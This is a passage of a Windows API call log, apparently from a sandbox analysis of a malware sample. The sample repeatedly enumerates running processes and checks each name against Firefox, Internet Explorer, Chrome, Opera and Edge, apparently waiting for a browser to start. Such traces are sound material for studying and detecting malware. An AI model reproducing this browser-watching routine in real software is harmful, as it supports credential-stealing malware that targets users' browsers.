pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0212.342] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0212.342] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0212.342] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0212.342] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0212.342] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.342] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0212.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0212.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0212.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0212.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0212.343] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.343] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0212.344] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0212.344] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0212.344] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0212.344] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0212.344] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.344] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0212.344] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0212.344] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0212.344] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0212.344] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0212.344] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.344] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0212.345] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0212.345] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0212.345] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0212.345] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0212.345] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.345] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0212.345] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0212.345] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0212.345] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0212.345] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0212.345] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.345] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0212.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0212.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0212.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0212.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0212.346] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.346] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0212.346] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0212.346] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0212.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0212.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0212.347] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.347] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0212.347] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0212.347] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0212.347] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0212.347] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0212.347] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.347] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0212.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0212.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0212.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0212.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0212.348] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.348] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0212.348] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0212.348] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0212.348] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0212.348] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0212.348] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.348] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0212.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0212.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0212.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0212.349] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.349] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.349] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.349] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.349] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.349] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.350] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.350] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0212.350] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0212.350] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0212.350] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0212.350] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0212.350] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.350] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.351] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.351] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.351] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.351] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.351] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.351] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.351] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0212.351] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0212.351] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0212.351] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0212.351] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.351] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.412] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.413] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.413] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.413] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0212.413] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0212.413] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0212.413] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0212.413] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0212.413] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0212.413] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0212.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0212.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0212.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0212.414] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.414] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.414] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.414] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.414] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0212.414] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.415] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.415] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.415] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.415] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0212.415] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.415] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0212.416] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0212.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0212.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0212.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0212.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0212.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0212.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0212.417] CloseHandle (hObject=0xe8) returned 1 [0212.417] Sleep (dwMilliseconds=0x3e8) [0213.433] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0213.436] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.436] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0213.436] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0213.436] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0213.436] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0213.436] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0213.436] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.437] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0213.437] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0213.437] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0213.437] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0213.437] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0213.437] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.438] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0213.438] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0213.438] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0213.438] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0213.438] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.438] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0213.438] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0213.438] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0213.438] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0213.438] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.439] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0213.439] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0213.439] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0213.439] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0213.439] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.439] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.439] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0213.439] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0213.439] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0213.439] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0213.439] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.440] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.440] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0213.440] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0213.440] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0213.440] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0213.440] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.440] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.441] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0213.441] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0213.441] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0213.441] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0213.441] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.441] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0213.441] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0213.441] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0213.441] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0213.441] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.442] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0213.442] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0213.442] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0213.442] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0213.442] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.442] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.442] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.442] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.442] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.442] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.442] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.442] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.443] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.443] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.443] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.443] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0213.443] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.443] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.444] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.444] 